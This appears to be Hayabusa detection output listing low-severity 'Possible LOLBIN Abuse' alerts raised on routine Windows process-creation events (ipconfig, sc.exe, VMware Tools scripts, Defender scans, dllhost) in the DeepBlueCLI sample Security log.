+2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
